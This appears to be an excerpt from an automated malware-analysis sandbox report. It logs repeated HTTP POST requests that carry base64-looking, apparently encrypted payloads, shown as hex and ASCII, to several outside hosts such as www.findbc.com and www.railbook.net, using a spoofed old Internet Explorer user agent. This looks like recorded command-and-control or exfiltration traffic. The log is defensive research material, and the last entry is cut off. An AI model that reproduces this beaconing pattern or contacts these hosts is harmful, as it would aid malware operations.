                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 65 67 5a 76 68 52 42 47 48 51 43 58 57 64 44 37 6f 2b 4a 6c 76 38 4d 72 55 61 4d 34 4e 69 50 79 52 4e 5a 57 30 32 61 38 35 4f 59 69 4a 46 4d 76 75 71 37 66 2f 41 4b 6f 59 48 65 39 2b 65 31 76 55 39 50 43 51 37 38 39 6c 6a 62 6d 56 6b 54 78 4b 66 73 33 72 68 51 35 2b 6d 63 56 68 52 30 64 34 6b 76 69 56 32 73 4d 32 4b 32 4f 33 4c 67 55 32 6b 76 78 68 4a 54 61 70 49 57 4c 51 41 4d 49 2b 39 50 52 77 66 6b 4d 78 33 71 4f 53 34 44 46 7a 6e 57 42 4b 48 52 4a 78 51 47 74 57 6d 51 49 53 63 38 59 7a 59 71 31 5a 59 47 69 6b 53 59 68 39 70 37 55 59 39 6f 63 66 51 6f 72 52 35 69 70 59 35 35 55 48 55 65 5a 61 6a 61 70 41 4f 57 70 52 30 63 32 4e 2b 67 74 6a 52 36 6d 77 50 7a 70 74 4b 43 72 6a 66 64 55 31 37 41 6b 66 79 32 31 53 7a 30 56 49 53 62 69 44 54 76 38 31 74 4b 33 74 64 62 39 4e 35 6e 49 66 45 45 6a 53 38 49 4f 71 71 6c 42 67 34 6d 39 39 48 58 4b 61 6a 55 75 68 33 59 49 4d 61 49 57 5a 49 4c 38 79 4a 64 7a 73 30 6e 59 4d 31 35 66 59 7a 41 2b 49 52 61 79 4e 32 51 62 39 64 70 4c 62 48 70 75 54 39 71 78 41 75 39 79 36 41 33 6b 7a 30 53 34 4c 70 37 2b 42 4b 76 4f 49 35 58 49 68 49 6d 68 7a 31 6c 72 4f 76 34 6e 36 39 7a 7a 4e 78 33 4a 6d 4a 41 63 79 52 41 55 6c 41 61 6b 4c 75 34 6e 77 4a 44 78 73 41 6a 79 55 34 6f 69 30 67 51 50 53 56 57 44 66 37 61 45 71 4b 72 79 4d 5a 7a 6f 36 30 58 64 39 74 46 73 4b 69 34 6d 74 4f 6e 6e 7a 64 54 34 6a 2b 32 52 2b 56 2f 5a 48 74 6c 58 78 78 54 61 48 50 53 58 55 65 64 2b 4e 66 4e 56 63 53 67 52 4f 36 6b 35 37 66 42 55 45 47 44 63 65 74 41 76 64 30 42 72 31 6d 67 75 61 44 32 56 73 67 69 65 4b 49 69 51 49 35 51 59 48 2f 33 61 6e 54 42 79 42 4b 6a 71 37 37 58 52 54 50 68 6e 59 35 57 2f 69 6e 48 52 67 54 78 42 46 63 69 32 4f 2f 55 3d Data Ascii: egZvhRBGHQCXWdD7o+Jlv8MrUaM4NiPyRNZW02a85OYiJFMvuq7f/AKoYHe9+e1vU9PCQ789ljbmVkTxKfs3rhQ5+mcVhR0d4kviV2sM2K2O3LgU2kvxhJTapIWLQAMI+9PRwfkMx3qOS4DFznWBKHRJxQGtWmQISc8YzYq1ZYGikSYh9p7UY9ocfQorR5ipY55UHUeZajapAOWpR0c2N+gtjR6mwPzptKCrjfdU17Akfy21Sz0VISbiDTv81tK3tdb9N5nIfEEjS8IOqqlBg4m99HXKajUuh3YIMaIWZIL8yJdzs0nYM15fYzA+IRayN2Qb9dpLbHpuT9qxAu9y6A3kz0S4Lp7+BKvOI5XIhImhz1lrOv4n69zzNx3JmJAcyRAUlAakLu4nwJDxsAjyU4oi0gQPSVWDf7aEqKryMZzo60Xd9tFsKi4mtOnnzdT4j+2R+V/ZHtlXxxTaHPSXUed+NfNVcSgRO6k57fBUEGDcetAvd0Br1mguaD2VsgieKIiQI5QYH/3anTByBKjq77XRTPhnY5W/inHRgTxBFci2O/U=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 4d 4d 63 55 68 6d 39 4c 48 51 44 66 48 61 43 77 6a 67 4c 52 52 33 6a 62 43 6c 75 46 58 48 4e 72 45 35 49 5a 75 65 4a 50 43 63 42 73 54 6f 6f 53 78 48 4c 76 30 2b 53 76 6c 52 49 58 4c 65 4d 72 7a 48 66 34 58 67 6c 59 4b 4b 70 68 57 56 4e 4a 31 66 6d 31 58 74 4d 2f 59 4b 72 77 4f 4b 51 48 70 32 43 6e 66 4c 78 34 68 44 35 2f 42 32 71 5a 76 68 37 34 48 49 62 5a 41 4c 62 51 35 6d 65 36 7a 6c 76 43 41 45 4e 45 6d 44 62 31 38 4b 31 6a 6a 48 53 78 46 43 38 62 42 7a 6a 64 64 2f 47 56 41 4a 47 4c 59 79 52 6e 62 77 42 58 37 78 2f 54 31 67 76 46 6a 66 57 74 77 69 4f 2f 49 37 5a 48 42 44 6e 5a 62 59 30 5a 33 73 67 57 6c 32 68 78 61 32 59 31 43 46 32 64 76 53 44 71 4b 31 4d 44 68 74 44 6e 46 79 44 37 34 73 53 33 68 44 72 4a 63 64 43 4d 6a 38 7a 47 4e 33 74 66 49 77 6f 49 33 54 69 68 69 6c 6d 36 59 63 44 58 35 42 71 72 58 68 42 78 49 49 4f 47 68 4b 30 34 30 32 70 35 4f 32 30 2f 6c 5a 74 73 69 57 49 47 76 6a 54 4f 66 73 56 2f 66 51 56 42 2f 48 4a 62 6c 4f 48 5a 2f 69 56 34 4d 6d 4f 4b 50 58 41 74 57 51 78 77 47 30 79 71 36 44 56 4c 63 53 58 54 4d 6c 39 4e 6b 7a 39 58 34 67 75 4c 66 45 7a 42 70 2f 49 71 52 4a 45 70 75 2f 33 58 74 41 4a 69 4c 47 58 59 2b 34 67 71 30 56 69 67 67 70 68 4f 4b 38 70 57 57 48 55 79 66 65 75 62 71 74 35 59 44 63 63 4e 68 52 7a 38 47 62 4f 75 36 45 5a 4f 51 54 66 63 33 66 35 46 78 35 6d 61 45 43 41 52 57 39 54 4a 57 45 56 34 31 41 62 6c 39 79 36 68 41 50 52 75 6e 4e 63 50 39 32 2f 4f 4b 6b 63 53 72 70 57 33 78 68 4d 4d 53 62 74 45 58 49 75 45 78 72 53 4a 78 5a 71 4a 54 7a 44 48 57 33 4d 53 4e 65 47 67 35 45 32 53 49 31 48 50 75 34 4e 72 66 4f 53 6e 39 73 44 71 6a 50 45 35 30 32 73 3d Data Ascii: MMcUhm9LHQDfHaCwjgLRR3jbCluFXHNrE5IZueJPCcBsTooSxHLv0+SvlRIXLeMrzHf4XglYKKphWVNJ1fm1XtM/YKrwOKQHp2CnfLx4hD5/B2qZvh74HIbZALbQ5me6zlvCAENEmDb18K1jjHSxFC8bBzjdd/GVAJGLYyRnbwBX7x/T1gvFjfWtwiO/I7ZHBDnZbY0Z3sgWl2hxa2Y1CF2dvSDqK1MDhtDnFyD74sS3hDrJcdCMj8zGN3tfIwoI3Tihilm6YcDX5BqrXhBxIIOGhK0402p5O20/lZtsiWIGvjTOfsV/fQVB/HJblOHZ/iV4MmOKPXAtWQxwG0yq6DVLcSXTMl9Nkz9X4guLfEzBp/IqRJEpu/3XtAJiLGXY+4gq0ViggphOK8pWWHUyfeubqt5YDccNhRz8GbOu6EZOQTfc3f5Fx5maECARW9TJWEV41Abl9y6hAPRunNcP92/OKkcSrpW3xhMMSbtEXIuExrSJxZqJTzDHW3MSNeGg5E2SI1HPu4NrfOSn9sDqjPE502s=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 33 4a 58 43 53 58 32 31 43 67 41 4f 66 4d 74 64 4e 50 68 2b 4f 72 62 6d 38 68 57 72 45 73 52 32 41 55 37 69 68 38 6e 57 6f 64 42 30 62 5a 6a 6a 53 4a 75 70 75 74 4b 73 70 33 43 66 69 54 75 35 77 58 34 32 71 4f 53 6d 79 53 44 6c 4e 46 4e 2f 63 44 32 5a 4d 56 71 74 5a 31 69 36 38 67 69 4e 7a 2b 50 31 43 51 4a 32 4c 51 6f 46 6a 48 74 51 6a 53 6f 33 4e 32 6b 4b 47 72 74 49 56 38 56 58 47 36 68 79 4e 50 53 36 6a 38 66 7a 36 66 44 6e 62 63 70 5a 38 30 33 4d 75 4e 4f 78 65 42 6d 52 41 33 44 6f 44 31 61 42 41 6f 73 73 38 55 6f 62 67 6e 72 69 49 51 6c 68 46 73 4b 65 53 6b 64 6a 30 32 4f 72 50 47 54 68 6e 46 4b 51 39 42 6c 6a 32 71 4b 32 72 76 4c 6b 42 43 73 52 42 61 4d 2f 58 34 6a 6c 6f 7a 44 32 71 7a 67 62 79 63 6b 73 4f 4d 77 79 62 73 4e 34 70 46 38 6d 58 48 49 2f 62 43 46 6e 72 35 6b 51 55 79 44 72 48 58 31 70 73 2b 6e 70 48 36 6e 30 71 49 75 59 6d 44 64 52 4d 75 67 62 74 36 62 31 2f 68 79 4e 72 77 39 75 74 4d 79 37 6b 54 39 69 66 50 38 56 5a 42 63 55 61 42 47 64 39 4e 6d 45 6b 41 52 70 51 4c 72 31 50 69 4f 59 36 38 66 68 68 69 35 2b 5a 42 62 38 59 76 74 41 61 65 54 79 42 73 64 75 58 5a 76 64 6b 6b 77 55 37 30 55 6e 35 53 42 4d 64 79 65 71 70 70 68 36 48 75 61 72 33 4e 52 2f 48 6c 35 73 69 32 74 74 4a 66 78 6b 6a 69 44 6f 2b 2b 32 57 55 6a 56 6a 45 64 62 5a 6f 34 4f 74 6c 37 31 71 4c 51 45 74 4f 30 52 4a 51 6a 6c 4c 44 36 77 6b 47 44 4a 56 73 63 4f 37 36 64 55 48 5a 4b 71 44 4b 44 76 55 55 74 64 6d 35 56 74 79 33 43 45 41 71 78 55 2b 69 6d 51 39 2b 67 72 30 51 46 6e 79 76 45 57 7a 4a 42 51 34 2b 36 41 67 48 6e 78 58 34 53 69 62 4f 58 4b 5a 6e 41 54 37 64 53 67 78 42 57 33 6d 75 31 37 6b 65 54 68 78 68 6e 34 41 46 6f 71 2b 41 42 6f 3d Data Ascii: 3JXCSX21CgAOfMtdNPh+Orbm8hWrEsR2AU7ih8nWodB0bZjjSJuputKsp3CfiTu5wX42qOSmySDlNFN/cD2ZMVqtZ1i68giNz+P1CQJ2LQoFjHtQjSo3N2kKGrtIV8VXG6hyNPS6j8fz6fDnbcpZ803MuNOxeBmRA3DoD1aBAoss8UobgnriIQlhFsKeSkdj02OrPGThnFKQ9Blj2qK2rvLkBCsRBaM/X4jlozD2qzgbycksOMwybsN4pF8mXHI/bCFnr5kQUyDrHX1ps+npH6n0qIuYmDdRMugbt6b1/hyNrw9utMy7kT9ifP8VZBcUaBGd9NmEkARpQLr1PiOY68fhhi5+ZBb8YvtAaeTyBsduXZvdkkwU70Un5SBMdyeqpph6Huar3NR/Hl5si2ttJfxkjiDo++2WUjVjEdbZo4Otl71qLQEtO0RJQjlLD6wkGDJVscO76dUHZKqDKDvUUtdm5Vty3CEAqxU+imQ9+gr0QFnyvEWzJBQ4+6AgHnxX4SibOXKZnAT7dSgxBW3mu17keThxhn4AFoq+ABo=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 65 67 5a 76 68 52 42 47 48 51 43 58 57 64 44 37 6f 2b 4a 6c 76 38 4d 72 55 61 4d 34 4e 69 50 79 52 4e 5a 57 30 32 61 38 35 4f 59 69 4a 46 4d 76 75 71 37 66 2f 41 4b 6f 59 48 65 39 2b 65 31 76 55 39 50 43 51 37 38 39 6c 6a 62 6d 56 6b 54 78 4b 66 73 33 72 68 51 35 2b 6d 63 56 68 52 30 64 34 6b 76 69 56 32 73 4d 32 4b 32 4f 33 4c 67 55 32 6b 76 78 68 4a 54 61 70 49 57 4c 51 41 4d 49 2b 39 50 52 77 66 6b 4d 78 33 71 4f 53 34 44 46 7a 6e 57 42 4b 48 52 4a 78 51 47 74 57 6d 51 49 53 63 38 59 7a 59 71 31 5a 59 47 69 6b 53 59 68 39 70 37 55 59 39 6f 63 66 51 6f 72 52 35 69 70 59 35 35 55 48 55 65 5a 61 6a 61 70 41 4f 57 70 52 30 63 32 4e 2b 67 74 6a 52 36 6d 77 50 7a 70 74 4b 43 72 6a 66 64 55 31 37 41 6b 66 79 32 31 53 7a 30 56 49 53 62 69 44 54 76 38 31 74 4b 33 74 64 62 39 4e 35 6e 49 66 45 45 6a 53 38 49 4f 71 71 6c 42 67 34 6d 39 39 48 58 4b 61 6a 55 75 68 33 59 49 4d 61 49 57 5a 49 4c 38 79 4a 64 7a 73 30 6e 59 4d 31 35 66 59 7a 41 2b 49 52 61 79 4e 32 51 62 39 64 70 4c 62 48 70 75 54 39 71 78 41 75 39 79 36 41 33 6b 7a 30 53 34 4c 70 37 2b 42 4b 76 4f 49 35 58 49 68 49 6d 68 7a 31 6c 72 4f 76 34 6e 36 39 7a 7a 4e 78 33 4a 6d 4a 41 63 79 52 41 55 6c 41 61 6b 4c 75 34 6e 77 4a 44 78 73 41 6a 79 55 34 6f 69 30 67 51 50 53 56 57 44 66 37 61 45 71 4b 72 79 4d 5a 7a 6f 36 30 58 64 39 74 46 73 4b 69 34 6d 74 4f 6e 6e 7a 64 54 34 6a 2b 32 52 2b 56 2f 5a 48 74 6c 58 78 78 54 61 48 50 53 58 55 65 64 2b 4e 66 4e 56 63 53 67 52 4f 36 6b 35 37 66 42 55 45 47 44 63 65 74 41 76 64 30 42 72 31 6d 67 75 61 44 32 56 73 67 69 65 4b 49 69 51 49 35 51 59 48 2f 33 61 6e 54 42 79 42 4b 6a 71 37 37 58 52 54 50 68 6e 59 35 57 2f 69 6e 48 52 67 54 78 42 46 63 69 32 4f 2f 55 3d Data Ascii: egZvhRBGHQCXWdD7o+Jlv8MrUaM4NiPyRNZW02a85OYiJFMvuq7f/AKoYHe9+e1vU9PCQ789ljbmVkTxKfs3rhQ5+mcVhR0d4kviV2sM2K2O3LgU2kvxhJTapIWLQAMI+9PRwfkMx3qOS4DFznWBKHRJxQGtWmQISc8YzYq1ZYGikSYh9p7UY9ocfQorR5ipY55UHUeZajapAOWpR0c2N+gtjR6mwPzptKCrjfdU17Akfy21Sz0VISbiDTv81tK3tdb9N5nIfEEjS8IOqqlBg4m99HXKajUuh3YIMaIWZIL8yJdzs0nYM15fYzA+IRayN2Qb9dpLbHpuT9qxAu9y6A3kz0S4Lp7+BKvOI5XIhImhz1lrOv4n69zzNx3JmJAcyRAUlAakLu4nwJDxsAjyU4oi0gQPSVWDf7aEqKryMZzo60Xd9tFsKi4mtOnnzdT4j+2R+V/ZHtlXxxTaHPSXUed+NfNVcSgRO6k57fBUEGDcetAvd0Br1mguaD2VsgieKIiQI5QYH/3anTByBKjq77XRTPhnY5W/inHRgTxBFci2O/U=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 43 54 78 66 68 74 68 4e 48 51 44 6c 70 6c 41 54 32 2f 63 48 68 63 73 75 34 6c 47 67 33 58 33 69 6a 50 62 6f 6a 79 79 2b 41 41 54 34 51 76 2b 45 30 76 4d 62 6f 77 4b 6a 55 70 63 6b 6c 42 59 6a 63 4a 56 6b 32 79 63 76 53 52 6a 53 46 39 4e 4f 59 78 7a 6a 49 35 5a 7a 2f 51 55 66 62 70 2f 77 7a 78 6f 63 7a 6e 53 6d 53 35 56 4d 62 4e 33 32 53 4d 62 42 63 69 65 61 44 2f 5a 44 38 6b 57 58 43 7a 2f 75 4d 69 6e 49 73 6c 55 49 59 74 4d 6f 73 4a 43 42 48 48 53 68 4c 6f 63 79 38 58 73 73 78 75 51 66 38 49 49 39 6e 2b 54 77 6f 6f 66 7a 45 59 4f 4f 43 47 33 4c 32 76 58 58 67 64 46 78 6d 69 34 35 6e 4c 43 4c 65 61 75 77 6e 4d 45 2b 67 4e 65 52 4c 79 48 57 32 55 78 73 58 77 73 32 31 39 50 53 66 46 41 62 53 38 33 36 79 4b 55 46 2f 47 6f 4b 77 2f 57 54 55 51 6b 6f 6d 47 2b 69 4a 6e 37 6d 37 44 57 69 38 72 35 65 36 43 53 67 4d 34 4e 56 72 2f 44 75 34 4c 33 58 77 56 45 6a 64 6b 39 65 75 34 69 4f 68 6b 55 36 69 4d 30 68 78 6a 66 74 44 62 5a 4e 54 51 67 72 38 44 68 2f 44 43 66 6b 6d 6f 56 35 62 4c 62 69 79 6a 4f 63 34 72 46 6f 30 49 49 35 58 73 7a 44 6d 64 6f 63 41 6e 7a 50 62 50 61 66 61 74 72 66 6c 74 4f 34 6d 30 6f 73 65 78 6e 34 69 70 63 48 56 37 47 4f 34 71 32 37 30 49 69 65 7a 5a 5a 68 46 65 31 50 61 65 47 78 4f 38 48 41 6c 30 5a 42 68 65 52 7a 76 48 74 45 49 43 66 69 70 4e 68 39 4a 6e 30 59 79 75 42 6c 4e 6f 4f 64 4c 4a 49 63 2f 57 6e 4b 4c 48 75 5a 70 4c 6b 71 58 65 66 52 55 6d 6d 75 79 34 59 6d 38 6e 66 7a 67 31 30 30 34 35 4d 55 43 34 51 2b 61 45 76 34 71 67 76 33 42 6c 70 6d 39 36 4d 5a 77 6d 67 32 48 57 49 51 49 4f 73 48 74 67 54 56 69 4a 37 58 50 2b 34 50 57 6e 66 42 63 54 75 36 6d 33 4d 67 35 57 42 37 6c 51 39 44 59 6b 74 44 73 70 35 58 47 6c 30 32 6f 69 61 57 53 76 35 69 68 44 69 76 Data Ascii: CTxfhthNHQDlplAT2/cHhcsu4lGg3X3ijPbojyy+AAT4Qv+E0vMbowKjUpcklBYjcJVk2ycvSRjSF9NOYxzjI5Zz/QUfbp/wzxocznSmS5VMbN32SMbBcieaD/ZD8kWXCz/uMinIslUIYtMosJCBHHShLocy8XssxuQf8II9n+TwoofzEYOOCG3L2vXXgdFxmi45nLCLeauwnME+gNeRLyHW2UxsXws219PSfFAbS836yKUF/GoKw/WTUQkomG+iJn7m7DWi8r5e6CSgM4NVr/Du4L3XwVEjdk9eu4iOhkU6iM0hxjftDbZNTQgr8Dh/DCfkmoV5bLbiyjOc4rFo0II5XszDmdocAnzPbPafatrfltO4m0osexn4ipcHV7GO4q270IiezZZhFe1PaeGxO8HAl0ZBheRzvHtEICfipNh9Jn0YyuBlNoOdLJIc/WnKLHuZpLkqXefRUmmuy4Ym8nfzg10045MUC4Q+aEv4qgv3Blpm96MZwmg2HWIQIOsHtgTViJ7XP+4PWnfBcTu6m3Mg5WB7lQ9DYktDsp5XGl02oiaWSv5ihDiv
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 77 34 4f 59 78 67 57 30 4a 77 42 47 63 48 30 4a 4c 42 57 71 70 48 37 4f 54 33 72 54 68 31 30 32 43 57 6c 44 32 49 77 68 43 4e 64 42 49 6b 76 2f 77 62 47 50 55 74 6b 79 6a 78 77 46 4e 2b 58 42 6e 78 74 62 6c 67 6b 77 43 50 47 39 55 7a 45 36 4e 6c 30 63 74 44 57 2b 6e 41 2f 58 50 74 31 58 70 48 64 54 48 32 50 45 7a 5a 6d 65 6d 36 4f 57 7a 43 54 35 75 6a 58 50 45 57 36 75 37 64 61 68 49 66 2f 36 4b 6d 6d 53 67 56 63 34 31 62 61 68 39 4a 68 31 34 67 79 63 75 53 44 4d 77 2b 73 30 67 76 62 58 73 71 6f 50 58 36 2b 2b 76 59 37 37 74 50 49 49 4d 56 41 44 6d 39 51 65 33 61 54 77 31 4b 71 77 55 71 2b 6d 37 74 49 64 56 42 39 31 66 6d 6e 4c 47 61 45 4e 68 43 2f 31 47 37 30 38 6d 36 58 56 6a 55 65 47 33 50 6c 33 6e 36 5a 73 4a 54 51 4e 59 42 46 72 73 6a 41 35 66 55 75 31 2f 70 47 59 6b 55 78 43 58 63 6a 64 35 78 49 65 6b 32 38 73 59 2f 48 69 5a 47 38 71 65 50 6c 47 36 69 34 6d 49 45 41 48 4f 6d 59 56 67 33 2f 77 43 68 42 4b 6e 56 76 72 30 57 77 6d 72 6e 7a 2b 7a 41 71 76 6f 4c 48 31 32 61 31 54 61 2b 44 33 39 6c 45 74 48 56 41 67 41 49 48 56 76 50 48 57 4c 4d 4e 30 44 58 6f 56 42 34 4e 42 57 36 79 46 71 45 47 4c 77 34 4c 65 61 6d 4a 32 2f 74 52 69 69 66 74 7a 2f 30 57 62 45 35 2f 70 6f 65 67 55 45 54 33 4d 54 4d 55 37 5a 59 6a 38 76 49 6f 72 51 35 75 6f 4c 6b 63 41 59 75 37 2f 72 54 52 51 5a 4b 6e 75 59 71 61 7a 34 4d 6c 77 30 57 5a 68 66 49 61 30 75 66 6d 4a 78 72 46 4c 71 4f 5a 63 35 42 30 44 62 32 36 4c 66 49 48 51 46 73 45 72 6d 41 55 54 6b 31 7a 79 70 46 41 59 77 58 76 79 7a 65 47 50 73 49 30 41 68 47 43 50 70 67 45 68 71 4a 31 4e 78 7a 75 50 71 65 7a 4d 59 30 4f 6f 5a 61 43 75 6c 36 36 66 66 6e 4c 62 44 43 55 32 77 51 66 32 69 4e 46 36 53 41 3d 3d Data Ascii: w4OYxgW0JwBGcH0JLBWqpH7OT3rTh102CWlD2IwhCNdBIkv/wbGPUtkyjxwFN+XBnxtblgkwCPG9UzE6Nl0ctDW+nA/XPt1XpHdTH2PEzZmem6OWzCT5ujXPEW6u7dahIf/6KmmSgVc41bah9Jh14gycuSDMw+s0gvbXsqoPX6++vY77tPIIMVADm9Qe3aTw1KqwUq+m7tIdVB91fmnLGaENhC/1G708m6XVjUeG3Pl3n6ZsJTQNYBFrsjA5fUu1/pGYkUxCXcjd5xIek28sY/HiZG8qePlG6i4mIEAHOmYVg3/wChBKnVvr0Wwmrnz+zAqvoLH12a1Ta+D39lEtHVAgAIHVvPHWLMN0DXoVB4NBW6yFqEGLw4LeamJ2/tRiiftz/0WbE5/poegUET3MTMU7ZYj8vIorQ5uoLkcAYu7/rTRQZKnuYqaz4Mlw0WZhfIa0ufmJxrFLqOZc5B0Db26LfIHQFsErmAUTk1zypFAYwXvyzeGPsI0AhGCPpgEhqJ1NxzuPqezMY0OoZaCul66ffnLbDCU2wQf2iNF6SA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.railbook.netCache-Control: no-cacheData Raw: 47 36 47 4f 50 73 6b 35 50 41 41 75 4d 39 6c 4b 47 50 67 6b 34 2b 4b 49 7a 73 62 6e 47 6d 30 77 44 63 6b 37 68 70 55 36 5a 41 75 73 75 49 78 51 56 39 64 36 4e 30 38 39 37 58 32 4a 6c 32 6d 4d 31 76 41 36 58 4c 2b 30 63 63 79 38 73 77 67 41 44 55 2b 56 6b 70 2f 6c 59 4e 6c 46 33 53 66 4e 5a 52 56 32 53 4f 70 74 65 30 4f 4c 7a 4d 50 6e 41 41 48 79 6a 4a 54 6c 61 38 6d 78 31 36 62 33 47 33 38 46 71 63 6a 48 4b 57 65 66 38 66 64 5a 50 73 6d 7a 2b 4e 4c 58 73 50 33 44 57 6a 63 62 45 58 47 68 59 75 49 6d 58 4f 48 78 67 6a 4f 64 75 45 57 51 62 75 56 56 67 56 4e 31 51 48 37 43 61 62 74 38 6c 51 71 36 7a 6d 48 48 74 4b 4f 64 38 31 66 79 39 63 75 72 76 43 57 2b 4e 73 65 4c 7a 59 39 6e 44 33 49 39 44 49 76 63 77 62 53 4d 6d 35 32 43 54 7a 2f 32 4f 31 6b 74 76 4c 49 45 4b 54 73 42 70 34 6a 56 6e 61 37 62 4b 68 53 2f 51 59 34 4a 54 77 46 4a 51 46 70 70 55 45 4c 69 61 31 44 6f 67 47 6d 64 4d 6a 5a 44 48 39 2b 32 4e 30 36 4f 48 51 4e 7a 4b 48 2f 6d 4f 47 79 6c 78 45 6e 50 68 37 68 69 34 72 64 42 51 36 52 6a 71 49 58 68 6e 4d 4b 4f 6e 44 4e 4e 54 32 6d 35 2f 49 47 36 6d 75 39 46 32 5a 42 49 6a 53 71 74 59 4f 55 46 69 6e 32 6c 66 43 70 4b 38 75 71 41 4a 44 35 38 64 73 2b 31 4f 62 4b 4b 38 48 5a 36 6c 74 71 54 43 2b 74 30 50 43 54 55 6c 71 73 67 6d 51 6a 37 53 31 47 64 4f 35 79 75 4d 33 38 4e 37 45 39 68 4f 54 4d 78 67 76 6e 51 4b 58 68 32 47 35 47 49 74 65 2b 32 62 58 45 45 57 46 35 4b 6c 53 59 79 36 76 70 64 31 46 6a 32 32 30 61 7a 36 7a 6f 44 77 34 71 78 4b 31 51 56 74 4c 50 4b 47 5a 64 32 37 75 7a 39 72 76 32 65 44 52 69 7a 5a 75 34 39 6b 55 44 42 6a 70 46 32 57 55 45 77 69 44 43 67 6e 53 52 6a 78 6b 68 4a 4c 58 50 30 2f 39 4f 6f 4e 4b 32 4e 37 35 70 58 45 6e 53 4f 77 59 4c 73 62 72 52 4a 67 54 6c 46 69 45 41 41 6f 5a 41 3d Data Ascii: G6GOPsk5PAAuM9lKGPgk4+KIzsbnGm0wDck7hpU6ZAusuIxQV9d6N0897X2Jl2mM1vA6XL+0ccy8swgADU+Vkp/lYNlF3SfNZRV2SOpte0OLzMPnAAHyjJTla8mx16b3G38FqcjHKWef8fdZPsmz+NLXsP3DWjcbEXGhYuImXOHxgjOduEWQbuVVgVN1QH7Cabt8lQq6zmHHtKOd81fy9curvCW+NseLzY9nD3I9DIvcwbSMm52CTz/2O1ktvLIEKTsBp4jVna7bKhS/QY4JTwFJQFppUELia1DogGmdMjZDH9+2N06OHQNzKH/mOGylxEnPh7hi4rdBQ6RjqIXhnMKOnDNNT2m5/IG6mu9F2ZBIjSqtYOUFin2lfCpK8uqAJD58ds+1ObKK8HZ6ltqTC+t0PCTUlqsgmQj7S1GdO5yuM38N7E9hOTMxgvnQKXh2G5GIte+2bXEEWF5KlSYy6vpd1Fj220az6zoDw4qxK1QVtLPKGZd27uz9rv2eDRizZu49kUDBjpF2WUEwiDCgnSRjxkhJLXP0/9OoNK2N75pXEnSOwYLsbrRJgTlFiEAAoZA=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.railbook.netCache-Control: no-cacheCookie: sid=772df5e2-bf10-11ed-a78d-8ad0764a686aData Raw: 47 36 47 4f 50 73 6b 35 50 41 41 75 4d 39 6c 4b 47 50 67 6b 34 2b 4b 49 7a 73 62 6e 47 6d 30 77 44 63 6b 37 68 70 55 36 5a 41 75 73 75 49 78 51 56 39 64 36 4e 30 38 39 37 58 32 4a 6c 32 6d 4d 31 76 41 36 58 4c 2b 30 63 63 79 38 73 77 67 41 44 55 2b 56 6b 70 2f 6c 59 4e 6c 46 33 53 66 4e 5a 52 56 32 53 4f 70 74 65 30 4f 4c 7a 4d 50 6e 41 41 48 79 6a 4a 54 6c 61 38 6d 78 31 36 62 33 47 33 38 46 71 63 6a 48 4b 57 65 66 38 66 64 5a 50 73 6d 7a 2b 4e 4c 58 73 50 33 44 57 6a 63 62 45 58 47 68 59 75 49 6d 58 4f 48 78 67 6a 4f 64 75 45 57 51 62 75 56 56 67 56 4e 31 51 48 37 43 61 62 74 38 6c 51 71 36 7a 6d 48 48 74 4b 4f 64 38 31 66 79 39 63 75 72 76 43 57 2b 4e 73 65 4c 7a 59 39 6e 44 33 49 39 44 49 76 63 77 62 53 4d 6d 35 32 43 54 7a 2f 32 4f 31 6b 74 76 4c 49 45 4b 54 73 42 70 34 6a 56 6e 61 37 62 4b 68 53 2f 51 59 34 4a 54 77 46 4a 51 46 70 70 55 45 4c 69 61 31 44 6f 67 47 6d 64 4d 6a 5a 44 48 39 2b 32 4e 30 36 4f 48 51 4e 7a 4b 48 2f 6d 4f 47 79 6c 78 45 6e 50 68 37 68 69 34 72 64 42 51 36 52 6a 71 49 58 68 6e 4d 4b 4f 6e 44 4e 4e 54 32 6d 35 2f 49 47 36 6d 75 39 46 32 5a 42 49 6a 53 71 74 59 4f 55 46 69 6e 32 6c 66 43 70 4b 38 75 71 41 4a 44 35 38 64 73 2b 31 4f 62 4b 4b 38 48 5a 36 6c 74 71 54 43 2b 74 30 50 43 54 55 6c 71 73 67 6d 51 6a 37 53 31 47 64 4f 35 79 75 4d 33 38 4e 37 45 39 68 4f 54 4d 78 67 76 6e 51 4b 58 68 32 47 35 47 49 74 65 2b 32 62 58 45 45 57 46 35 4b 6c 53 59 79 36 76 70 64 31 46 6a 32 32 30 61 7a 36 7a 6f 44 77 34 71 78 4b 31 51 56 74 4c 50 4b 47 5a 64 32 37 75 7a 39 72 76 32 65 44 52 69 7a 5a 75 34 39 6b 55 44 42 6a 70 46 32 57 55 45 77 69 44 43 67 6e 53 52 6a 78 6b 68 4a 4c 58 50 30 2f 39 4f 6f 4e 4b 32 4e 37 